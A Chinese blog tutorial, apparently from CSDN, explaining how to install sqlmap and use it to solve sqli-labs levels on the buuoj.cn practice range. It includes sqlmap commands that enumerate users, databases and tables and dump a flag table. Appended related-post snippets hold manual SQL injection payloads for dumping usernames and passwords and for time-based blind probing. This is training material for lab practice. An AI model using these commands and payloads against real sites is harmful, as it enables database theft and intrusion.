【史上最全sqlmap通关sqli-labs靶场教程】

最新推荐文章于 2024-02-10 06:24:39 发布
最新推荐文章于 2024-02-10 06:24:39 发布
阅读量2.2k 收藏 17
点赞数 4
文章标签: 安全 web安全 sql 经验分享 安全威胁分析 网络安全 系统安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44652484/article/details/133845161
版权

下载sqlmap地址:sqlmap: automatic SQL injection and database takeover tool

下载完成后解压在C盘或者D盘都行,自己别忘了就可以

解压后在目标文件夹下打开cmd,运行python sqlmap.py -h

运行后出现sqlmap的说明,表示安装成功

这里补充一下,-h其实不是完成的说明,-hh可以获得更多说明,

如果不在sqlmap的本目录下执行python sqlmap.py -h,这样是执行不成功的
怎么样才能快速的打开cmd窗口就能用sqlmap呢?
把sqlmap添加至环境变量

如果想运行sqlmap的时候起前面不加python,还要再加个变量
PATHEXT变量名里面添加:.PY;
添加完成后,关闭cmd窗口重新打开一个,输入sqlmap -h出现说明,表示成功

接下来开靶场进行实验:

https://buuoj.cn/

复制靶机地址到cmd窗口:
-u 执行url      ?id=1 指定传参点

第一次运行时,会询问注入探测等级和风险等级:-level   -risk
一般选择默认即可,继续输入:Y

再次询问:GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
GET参数“id”易受攻击。你想继续测试其他的(如果有的话)吗?[y / N]
这次输入:n

注入完成后,可以看到执行的注入类型以及payload有:布尔盲注、报错注入、时间盲注、union注入
最后还做了一个备份,复制打开地址
Log文件就是记录了有哪些注入漏洞

下面进行获取flag操作:
获取用户:root@localhost
sqlmap -u "http://fb693e0a-133c-46d5-9b16-47a5595a40a5.node4.buuoj.cn/Less-1/?id=1" --current-user

获取数据库:ctftraining
sqlmap -u "http://fb693e0a-133c-46d5-9b16-47a5595a40a5.node4.buuoj.cn/Less-1/?id=1" --dbs

获取表:flag、news、users
sqlmap -u "http://fb693e0a-133c-46d5-9b16-47a5595a40a5.node4.buuoj.cn/Less-1/?id=1" -D ctftraining --tables
-D指定数据库的范围,只注入ctftraining 这个库,注出来有哪些表

获取flag:flag{b76e1d78-cbcd-4a24-88b8-84e895acb7d1}
sqlmap -u "http://8f6332d9-5ca6-406f-a4ad-db0bdb660ad5.node4.buuoj.cn/Less-1/?id=1"  -D ctftraining -T flag --dump

尝试post型注入:Less-12

使用BP抓包获取post报文,保存在txt文件里
-r代表文档,文档内容就是你的post报文 --batch 自动选择yes
sqlmap -r post_sqlmap.txt --batch -dbs
获取到我们熟知的关键数据库:ctftraining

获取表:flag、news、users
sqlmap -r post_sqlmap.txt --batch -D ctftraining --tables

获取flag:flag{b76e1d78-cbcd-4a24-88b8-84e895acb7d1}
sqlmap -r post_sqlmap.txt --batch -D ctftraining -T flag --dump

至此结束!

关注我,随时留言交流~

DMXA
关注
  • 4
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
sqlilabs靶场,课上靶场源码,sqlmap,BurpSuit,Antsword,二次注入脚本,课上用的源码
04-22
sqlilabs靶场(常用靶场),课上靶场源码(blog的源码),sqlmapsql注入神器),BurpSuit(以后最常用的工具),Antsword(webshell的连接工具),二次注入脚本(可以修改脚本),课上用的源码
sqli-labs-master-注入学习靶机
01-19
sqli-labs是一个非常好的学习sql注入的一个游戏教程,是一个印度程序猿的搬砖建造的,对于了解sqlmap的原理很有帮助。
SQL注入:sqli-labs靶场通关(1-37关)
qq_68163788的博客
02-03 3173
sqli-labs是一个用于学习和练习SQL注入的开源项目。它提供了一系列的实验室环境,让用户能够在不同的SQL注入场景中进行练习和测试。这些场景包括基本的SQL注入、盲注、联合查询注入等等。 sqli-labs还提供了详细的说明和解释,帮助用户理解SQL注入的原理和技术。通过这些实验和学习,用户可以更好地了解SQL注入的危害,并学会如何防范和阻止SQL注入攻击
Sqli靶场 11--->22Less
huohaowen的博客
01-29 1573
又是打靶场的一天(靶场球球你别打我)
sqli-labs 靶场通关(11-22)
知世郎
10-16 196
前十关使用的是get请求,参数都体现在url上面,而从十一关开始是post请求,参数是在表单里面。1' ,2, (extractvalue(1,concat(0x5c,(select group_concat(password,username) from users),0x5c)))# 爆账户密码。1',2,updatexml (1,concat(0x5c,(select group_concat(username,password) from users),0x5c),1))# 爆账户密码。
Sqli-labs靶场搭建(适合新手小白围观)
weixin_72543266的博客
09-12 5493
本章是对SQL注入进行一个简单的回归,然后就是对于自己在搭建靶场中所遇到的一些问题的解决办法,以及进行安装步骤的总结,对于自己的自主配置和独立解决问题的能力是一种培养每日一言真正的有福之人,是经历极大的挫折磨难后,依然屹立不倒的人。一个人能承受的东西越多,他所能得到的馈赠才越多。
sqli-labs靶场使用sqlmap自动化注入
星虐
03-15 1110
1.检测存在注入 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ 2.爆出所有数据库名称 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ --dbs 3.爆出security库中的所有表 命令:sqlmap -u ‘http://192.168.1.17/sqli-labs/Less-1/?id=1’ -D security --tables 4.爆出users表中的
sql-lab靶场原理详解(1-22关)
cz020907020808的博客
06-01 965
id=1 'and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) – qwe 延时,说明数据库的第一个的第一位是e。id=1 'and if ((ascii(substr(database(),1,1))=115),sleep(5),1) --qwe 延时,说明数据库第一位是s。
Sql-labs靶场(1~28)
xhx836161547的博客
12-29 4645
sql注入经典靶场Sql-labs全关详解,正在加急更新中
sqli-labs靶场通关(1-10)
Fly_Mojito的博客
06-11 3375
sqli-labs靶场通关(1-10)
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
tmzy1的博客
03-19 4775
SQL注入(DVWA靶场搭建及使用、sqlMap注入、sqlmap问题及解决办法)
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip)
04-20
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.zip)
sqlmap-1.6.5-11_sqlmap-1.6.5-11
09-20
sqlmap-1.6.5-11 sql注入工具
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix等多种数据库管理系统。 完全支持布尔型盲注、时间型盲注、基于错误信息的注入、联合查询注入和堆查询注入。 在数据库证书、IP地址、端口和数据库名等条件允许的情况下支持不通过SQL注入点而直接连接数据库。 支持枚举用户、密码、哈希、权限、角色、数据库、数据表和列。 支持自动识别密码哈希格式并通过字典破解密码哈希。 支持完全地下载某个数据库中的某个表,也可以只下载某个表中的某几列,甚至只下载某一列中的部分数据,这完全取决于用户的选择。 支持在数据库管理系统中搜索指定的数据库名、表名或列名 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持下载或上传文件。 当数据库管理系统是MySQL、PostgreSQL或Microsoft SQL Server时支持执行任意命令并回现标准输出。
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.tar.gz)
04-20
sqlmapsqlmapproject-sqlmap-1.6.4-4-gfb3f428.tar.gz)
网络安全05-sql-labs靶场全网最详细总结
最新发布
m0_68976043的博客
02-10 1663
sql注入有很多方式其中我们最详细见到的就是:基于错误的注入(Error-based Injection): 攻击者利用应用程序返回的错误消息来识别漏洞。通过在 SQL 查询中插入恶意代码,攻击者可以引发数据库错误,然后根据错误消息获得关于数据库结构和内容的信息。基于联合查询的注入(Union-based Injection): 攻击者利用 UNION 查询将恶意结果合并到应用程序的原始查询结果中。通过在 SQL 查询中插入 UNION 子句,攻击者可以将额外的查询结果合并到原始结果中,从而泄露敏感信息。基
web安全之通过sqlmap工具进行靶场练习
记录学习,一起进步
12-07 1016
web安全之通过sqlmap工具对靶场进行练习
渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战篇
weixin_52796034的博客
10-14 2084
SQLMap,就像它的名字所暗示的,是一个为我们提供方便的“SQL注入攻击”的工具。对于那些不熟悉这个概念的人来说,SQL注入是一种黑客攻击技术,允许攻击者在目标网站的数据库中执行恶意SQL语句。这意味着我们可以控制和操纵网站的数据,甚至可以完全接管整个网站。那么SQLMap如何帮助我们实现这些呢?
sqlmap通关sqli-labs靶场
06-28
### 回答1: SQLMap是一个开源的SQL注入自动化工具,可以帮助你通过SQLi-Labs靶场。使用SQLMap,你需要熟悉基本的命令行语法,并了解SQL注入的基本原理。为了使用SQLMap通过SQLi-Labs靶场,你可以尝试使用以下命令: ``` sqlmap -u <target URL> --dbs ``` 这将列出数据库列表。接下来,你可以使用以下命令枚举数据表: ``` sqlmap -u <target URL> -D <database name> --tables ``` 最后,你可以使用以下命令读取数据表中的数据: ``` sqlmap -u <target URL> -D <database name> -T <table name> --dump ``` 请注意,在实际渗透测试中,使用SQLMap和其他工具需要遵循道德准则和法律规定。 ### 回答2: SQL注入是目前常见的一种攻击方式,它很容易对基于SQL的Database进行利用,最终获取Database中的敏感信息。为了更好地理解SQL注入攻击方式,学习和了解其渗透测试方式非常必要。而sqli-labs是一款SQL injection实验环境,旨在用来提高SQL技术的实际应用能力和渗透测试的技能。 在sqli-labs中,存在很多漏洞类型需要渗透测试,通过这些漏洞攻击我们可以得到不同的信息。要完成这些测试,我们需要一个工具来探测一个web应用程序中的SQL注入漏洞,这个工具就是SQLMAPSQLMAP工具是一个开源工具,用Python语言编写,接受界面式和命令行调用方式,功能非常强大。 下面是sqlmap通关sqli-labs靶场的步骤: 1. 下载并安装SQLMAP SQLMAP安装包的下载可以到官方网站上下载,或者使用Git Clone命令克隆仓库。安装过程中,需要依赖Python环境,所以需要先安装Python环境。 2. 下载sqli-labs sqli-labs的下载可以从官方网站或者GitHub上下载,解压并配置好环境。 3. 识别目标网站 使用命令行工具,进入SQLMAP所在的目录,输入命令:`python sqlmap.py -u <target-url>`,其中,target-url指的是sqli-labs中的URL。 4. 扫描漏洞 使用命令来扫描不同的漏洞,比如:`python sqlmap.py -u <target-url> --dbs`,表示对目标URL进行数据库的探测。 5. 选择漏洞 通过返回的扫描结果,选择需要攻击的漏洞。 6. 进行攻击 对选择的漏洞进行攻击,使用命令:`python sqlmap.py –-tamper=space2mysql -u <target-url> -p <vuln-field> --dbs`,其中,tamper参数是选用的注入脚本,space2mysql就是其中一个比较好用的注入脚本之一,vuln-field指的是目标网站的漏洞点。 7. 数据库探测和获取数据 通过命令:`python sqlmap.py -u <target-url> --dbs`获取到可用的数据库,再使用命令:`python sqlmap.py -u <target-url> -D databaseName -T tableName --dump`来获取表中的数据。 通过上述步骤,sqlmap就可以在sqli-labs的攻击和测试中展示其强大的功能。需要注意的是,任何时候针对他人的web应用程序进行测试之前,务必获得允许进行渗透测试的正式授权。 ### 回答3: SQL注入是一种常见的安全漏洞,黑客可以利用它来攻击网站。为了更好地了解和防范这种攻击,我们可以通过搭建sqli-labs靶场来进行学习和实践,而SQLmap则是一款自动化SQL注入工具,可以大大提高注入的效率。现在,我将详细介绍如何通过SQLmap通关sqli-labs靶场。 第一步:下载sqli-labs和SQLmap 首先,我们需要先下载本地的sqli-labs靶场SQLmap工具。sqli-labs靶场可以从GitHub上下载,而SQLmap工具则可以从官网或GitHub上下载。 第二步:启动sqli-labs 我们需要启动sqli-labs靶场,进入其对应的文件夹中,运行命令“sudo ./logstart.sh”即可启动。 第三步:寻找sqli-labs中的注入漏洞 接下来,我们需要寻找sqli-labs中的注入漏洞,这可以通过用浏览器访问sqli-labs的web应用程序来完成。我们可以利用输入一些特殊符号来调用SQL语句,并观察服务器的返回结果。如果返回结果与预期不符,则可能存在注入漏洞。 第四步:使用SQLmap进行注入攻击 现在,我们已经找到存在漏洞的地方了,接下来就是使用SQLmap进行注入攻击。在命令行中输入“python sqlmap.py -u [漏洞URL] --dbs”即可进行漏洞测试。如果存在注入漏洞,则SQLmap会在其中进行攻击并自动检测到被攻击的数据库。 第五步:进一步利用SQLmap 此时,我们已经成功地利用SQLmap进行了注入攻击,接下来可以进一步利用SQLmap进行数据抓取、渗透等操作。我们可以通过输入“python sqlmap.py -u [漏洞URL] -D [数据库名] -T [表名] --dump”来进行数据抓取操作,获取数据并进行进一步的分析。 总结: 通过以上步骤,我们可以利用SQLmap成功地通关sqli-labs靶场。值得注意的是,在进行学习和实践过程中,一定要注意合法性和安全性,避免非法入侵和攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值